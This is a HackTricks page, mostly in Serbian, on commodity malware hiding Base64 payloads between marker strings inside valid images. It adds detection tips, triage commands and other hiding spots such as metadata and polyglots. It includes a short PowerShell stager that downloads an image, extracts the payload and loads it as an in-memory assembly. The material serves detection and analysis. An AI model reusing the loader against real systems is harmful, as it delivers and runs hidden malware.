Malware & Network Stego

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Nije sva steganography bazirana na pixel LSB; commodity malware često skriva payloads u inače validnim fajlovima.

Praktični obrasci

Payloads obeleženi markerima u validnim slikama

Ako se slika preuzme i odmah parsira kao tekst/Base64 od strane skripte, payload je često označen markerima umesto da bude pixel-hidden.

Commodity loaders sve više skrivaju Base64 payloads kao plain text unutar inače validnih slika (često GIF/PNG). Umesto pixel-level LSB, payload je odvojen jedinstvenim marker stringovima ubačenim u tekst/metadata fajla. A stager zatim:

  • Preuzima sliku preko HTTP(S)
  • Pronalazi početne i završne markere
  • Ekstrahuje tekst između markera i Base64-dekodira sadržaj
  • Učitava/izvršava u memoriji

Minimal PowerShell carving snippet:

$img = (New-Object Net.WebClient).DownloadString('https://example.com/p.gif')
$start = '<<sudo_png>>'; $end = '<<sudo_odt>>'
$s = $img.IndexOf($start); $e = $img.IndexOf($end)
if($s -ge 0 -and $e -gt $s){
$b64 = $img.Substring($s + $start.Length, $e - ($s + $start.Length))
$bytes = [Convert]::FromBase64String($b64)
[Reflection.Assembly]::Load($bytes) | Out-Null
}

Notes:

  • ATT&CK: T1027.003 (steganography)
  • Detection/hunting:
  • Skenirajte preuzete slike na prisustvo delimiter stringova.
  • Označite skripte koje preuzimaju slike i odmah pozivaju rutine za dekodiranje Base64 (PowerShell FromBase64String, JS atob, etc).
  • Tražite HTTP content-type neslaganja (image/* response but body contains long ASCII/Base64).

Other high-signal places to hide payloads

Ove lokacije se obično brže provere nego content-level pixel stego:

  • Metapodaci: EXIF/XMP/IPTC, PNG tEXt/iTXt/zTXt, JPEG COM/APPn segments.
  • Bajtovi na kraju fajla: podaci dodati nakon formalnog završnog markera (npr., nakon PNG IEND).
  • Ugrađeni arhivi: ZIP/7z ugrađen ili dodat i ekstrahovan od loader-a.
  • Polyglots: fajlovi napravljeni da budu validni za više parsera (npr., image + script + archive).

Komande za trijažu

file sample
exiftool -a -u -g1 sample
strings -n 8 sample | head
binwalk sample
binwalk -e sample

Izvori:

  • Primer iz Unit 42: https://unit42.paloaltonetworks.com/phantomvai-loader-delivers-infostealers/
  • MITRE ATT&CK: https://attack.mitre.org/techniques/T1027/003/
  • Poligloti formata fajla i trikovi sa kontejnerima: https://github.com/corkami/docs
  • Aperi’Solve (web-bazirana stego trijaža): https://aperisolve.com/

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks